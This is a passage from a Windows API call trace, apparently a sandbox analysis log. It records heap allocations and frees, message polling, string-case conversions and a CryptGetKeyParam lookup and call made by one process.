lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2850 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0080.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf40 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0080.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0080.073] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0080.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0080.074] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0080.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0080.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0080.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0080.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0080.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0080.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0080.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0080.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0080.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0080.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0080.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0080.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0080.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.075] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0080.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0080.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0080.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0080.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0080.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0080.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0080.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0080.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0080.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0080.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0080.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0080.075] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0080.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0080.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadf0 [0080.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0080.075] PeekMessageW (in: lpMsg=0x144dd94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dd94) returned 0 [0080.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0080.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0080.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0080.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0080.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0080.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0080.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0080.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0080.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0080.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0080.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0080.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0080.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0080.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0080.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0080.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0080.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0080.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0080.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0080.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0080.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0080.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0080.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0080.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0080.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0080.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0080.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.078] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0080.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0080.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0080.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0080.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0080.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0080.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0080.080] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0080.080] CryptGetKeyParam (in: hKey=0x41ac440, dwParam=0x7, pbData=0x43e2770, pdwDataLen=0x144ddb0, dwFlags=0x0 | out: pbData=0x43e2770*=0x6610, pdwDataLen=0x144ddb0*=0x4) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0080.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0080.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0080.082] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: 